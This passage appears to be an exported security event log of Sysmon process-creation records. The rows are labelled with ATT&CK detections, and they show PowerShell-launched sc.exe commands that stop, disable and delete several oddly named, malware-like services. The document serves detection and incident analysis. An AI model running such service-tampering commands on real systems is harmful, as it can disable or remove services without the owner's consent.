sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.677"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00102b3f2600}"",""processId"":""5692"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.653",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.604 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c3382600} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config mssecsvc2.1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.608856800Z"",""eventRecordID"":""2930"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.604\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c3382600}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 
10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.604"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010c3382600}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config mssecsvc2.1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.580",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.341 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-001088242600} +ProcessId: 5844 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.357594400Z"",""eventRecordID"":""2927"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.341\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-001088242600}\r\nProcessId: 5844\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.341"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-001088242600}"",""processId"":""5844"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.525",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.261 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010d9212600} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.264794200Z"",""eventRecordID"":""2924"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.261\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010d9212600}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:56.261"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010d9212600}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.496",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.144 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010a41f2600} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.181005800Z"",""eventRecordID"":""2922"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.144\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010a41f2600}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.144"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010a41f2600}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.484",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.088 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010f51d2600} +ProcessId: 1412 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 
""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.094939800Z"",""eventRecordID"":""2921"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.088\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010f51d2600}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.088"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010f51d2600}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.432",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.042 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010da192600} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.050403300Z"",""eventRecordID"":""2918"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.042\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010da192600}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media 
